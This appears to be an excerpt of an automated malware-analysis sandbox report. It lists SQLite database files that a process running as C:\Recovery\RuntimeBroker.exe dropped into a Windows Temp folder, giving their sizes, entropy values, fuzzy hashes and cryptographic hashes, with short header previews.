                                                                                                            C:\Users\user\AppData\Local\Temp\1LKPy2Ba3v

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\1t4afcgAyN

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\1txY4fqNk2

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\22MZs9A37v

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\2rznWkRGQl

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\2vKFolEJK9

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\3vPCWnmSPY

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\48xXbRpi02

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\4Az9hx3kDb

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\4WBcW6nRWy

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\4WFD8vwzmv

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\4jaFva0Y6Y

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\4xfurzWh4r

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\5VMx1UwrKG

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\5v7edNo16m

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\6AXfZkxDXl

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\6Paokndcne

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\6eQP3kc8mU

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\7CuzXjbOSq

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\7QWGrs9Ksr

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\7Rvbgt5ZmD

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\7of1Pi4HGN

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\7ug7s6SXZi

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

